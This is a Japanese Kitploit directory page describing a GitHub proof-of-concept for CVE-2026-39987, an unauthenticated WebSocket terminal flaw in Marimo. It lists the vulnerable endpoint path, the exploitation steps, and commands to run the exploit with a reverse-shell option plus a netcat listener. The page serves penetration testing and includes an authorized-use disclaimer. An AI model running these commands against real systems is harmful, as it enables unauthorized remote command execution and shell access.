Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-39987_RCE_PoC — CVE-2026-39987のPython proof-of-concept。認証不要のWebSocketターミナルエンドポイントを悪用し、リモートコマンド実行とリバースシェルアクセスを実現します。 | Kitploit
ツール/GitHubGitHub/mfahdk/cve-2026-39987_rce_poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストリモートアクセスツール
GitHubmfahdk/cve-2026-39987_rce_poc

CVE-2026-39987_RCE_PoC

CVE-2026-39987のPython proof-of-concept。認証不要のWebSocketターミナルエンドポイントを悪用し、リモートコマンド実行とリバースシェルアクセスを実現します。

リポジトリを見る
11日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-39987 — Marimo WebSocket RCE PoC

CVE-2026-39987 の概念実証(PoC)で、脆弱な WebSocket ターミナルエンドポイントを介したリモートコマンド実行を実証します。

免責事項: この PoC は、許可されたセキュリティテストおよび教育目的でのみ使用することを意図しています。自身が所有するシステム、またはテストの明示的な許可を得たシステムに対してのみ使用してください。

説明

この脆弱性により、認証されていないユーザーがアプリケーションの WebSocket ターミナルエンドポイントと対話し、コマンドをリモートで実行できるようになります。

PoC は以下に接続します:

root@kitploit:~
wss://<target>/terminal/ws

そして WebSocket 接続を介したコマンド実行を実証します。

この PoC の開発・テスト中に使用されたターゲットは、許可された Hack The Box ラボ環境でした。

要件

  • Python 3
  • websocket-client

必要なライブラリをインストールします:

root@kitploit:~
pip3 install websocket-client

使用方法

root@kitploit:~
python3 test.py <domain>

例:

root@kitploit:~
python3 test.py somesite.com

PoC は WebSocket 接続を確立し、テストコマンドを実行します。

リバースシェル

PoC はリバースシェルオプションもサポートしています:

root@kitploit:~
python3 exploit.py <domain> --reverse-shell <IP> --port <PORT>

例:

root@kitploit:~
python3 exploit.py somesite.com --reverse-shell 10.10.14.5 --port 4444

PoC を実行する前にリスナーを起動します:

root@kitploit:~
nc -lvnp 4444

技術的詳細

このアプリケーションは、認証を必要とせずに WebSocket ターミナルエンドポイントを公開しています。

PoC は以下を実行します:

  1. WebSocket 接続を確立します。
  2. ラボターゲットが自己署名証明書を使用しているため、TLS 証明書の検証を無効にします。
  3. 初期のターミナルプロンプトを消費します。
  4. WebSocket を介してコマンドを送信します。
  5. 結果として得られるターミナル出力を読み取ります。

最初の ws.recv() は重要です。なぜなら、サーバーは接続確立直後にシェルプロンプトを送信するからです。

ツールをダウンロード